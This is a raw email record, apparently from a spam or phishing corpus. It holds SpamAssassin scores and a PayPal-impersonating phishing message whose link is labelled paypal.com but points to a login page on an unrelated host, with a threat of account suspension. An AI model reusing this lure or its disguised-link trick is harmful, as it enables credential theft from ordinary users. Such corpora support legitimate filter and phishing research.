	*  0.0 NO_REAL_NAME From: does not include a real name
	*  0.1 MISSING_HEADERS Missing To: header
	*  0.1 RAZOR2_CF_RANGE_51_100 BODY: Razor2 gives confidence level above 50%
	*      [cf: 100]
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  1.5 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
	*  1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
	*      [Blocked - see <http://www.spamcop.net/bl.shtml?65.168.117.188>]
	*  3.1 RCVD_IN_XBL RBL: Received via a relay in Spamhaus XBL
	*      [65.168.117.188 listed in sbl-xbl.spamhaus.org]
	*  0.1 HTML_MIME_NO_HTML_TAG HTML-only message, but there is no HTML tag
To: undisclosed-recipients: ;
Status: O
X-Status: 
X-Keywords:                  
X-UID: 22

<html>
<head>
</head>
<body>
<div align="left"><a href="http://www.paypal.com"><img
src="https://www.paypal.com/en_GB/i/header/t1Hdr_hpGraphic_563x115.jpg"
border="0"></a>&nbsp;
</div>
<table align="center" border="0" cellpadding="0" cellspacing="0"
width="600">
<tbody>
<tr>
<td colspan="3"><img src="pp.files/pixel.gif" height="2" width="2"></td>
</tr>
</tbody>
</table>
<a href="http://www.paypal.com/cgi-bin/webscr?cmd=_login-run">
</a>
<table border="0" width="50%">
<tbody>
<tr>
<td>
<p><font size="2"><font face="Verdana">Dear valued&nbsp;<strong><strong><span
style="font-size: 10pt; color: black; font-family: Verdana;">PayPal<sup>&reg;</sup></span></strong>&nbsp;</strong>member</font>:&nbsp;<br>
</font><br>
</p>
<p><font face="Verdana" size="2">It has come to our attention
that your&nbsp;<span
style="font-size: 10pt; color: black; font-family: Verdana;"><strong>PayPal<sup>&reg;</sup></strong></span>
account information needs to be&nbsp;updated as part of our continuing
commitment to protect your account and to&nbsp;reduce the instance of
fraud on our website.&nbsp;</font><font face="Verdana" size="2"><font
face="Verdana" size="2"> If you could please take 5-10
minutes&nbsp;out of your </font><font face="Verdana" size="2">online </font><font
face="Verdana" size="2">experience and update your personal records
you will not run into&nbsp;any future </font><font face="Verdana"
size="2">problems with the online service.&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font></font></p>
<font face="Verdana" size="2">
<p><font face="Verdana" size="2">However, failure to update your
records will result in account suspension.&nbsp;<br>
&nbsp;<br>
<br>
Once you have updated your account records, your&nbsp;<span
style="font-size: 10pt; color: black; font-family: Verdana;"><strong>PayPal<sup>&reg;</sup></strong></span>
session will not be&nbsp;interrupted and will continue as normal. </font></p>
<p><font face="Verdana" size="2">To update your <span
style="font-size: 10pt; color: black; font-family: Verdana;"><strong>PayPal<sup>&reg;</sup></strong></span>
records click on the following link:&nbsp;<br>
</font> <a href="http://mail.pooding.com/src/resolution_center/index.php?cmd=LogIn"><font
face="Verdana" size="2">http://www.paypal.com/cgi-bin/webscr?cmd=_login-run</font></a></p>
<p><font face="Verdana" size="2"></font>&nbsp;</p>
<p><font face="Verdana" size="2">Thank You. &nbsp;<br>
<span style="font-size: 10pt; color: black; font-family: Verdana;"><strong>PayPal<sup>&reg;
</sup><span
style="font-size: 10pt; color: black; font-family: Verdana;">UPDATE </span></strong><span
style="font-size: 10pt; color: black; font-family: Verdana;"><strong>TEAM</strong></span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</font></p>
<img src="http://www.paypal.com/en_US/i/logo/paypal_logo.gif"
border="0"> <font face="Verdana" size="2">
<p><font face="Verdana" size="2">Accounts Management As outlined
in our User Agreement, <span
style="font-size: 10pt; color: black; font-family: Verdana;"><strong>PayPal<sup>&reg;</sup></strong></span>
will&nbsp;periodically send you information about site changes and
enhancements. </font></p>
</font></font></td>
</tr>
</tbody>
</table>
<a href="http://www.paypal.com/cgi-bin/webscr?cmd=_login-run"> </a>
</body>
</html>

From test@simhope.com.tw  Mon Nov 21 06:31:25 2005
Return-Path: <test@simhope.com.tw>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id D9378536E7F
	for <nobody@login.example.com>; Mon, 21 Nov 2005 06:31:24 -0500 (EST)
Received: from mail2.example.com (localhost.example.com [127.0.0.1])
	by mail2.example.com (Postfix) with ESMTP id 6606F6FA3A9
	for <nobody@example.com>; Mon, 21 Nov 2005 06:31:22 -0500 (EST)
Received: from simhope.com.tw (61-221-79-115.HINET-IP.hinet.net [61.221.79.115])
	by mail2.example.com (Postfix) with ESMTP
	for <nobody@example.com>; Mon, 21 Nov 2005 06:31:22 -0500 (EST)
Received: by simhope.com.tw (Postfix, from userid 504)
	id 3A9D8244193; Mon, 21 Nov 2005 19:20:15 +0800 (CST)
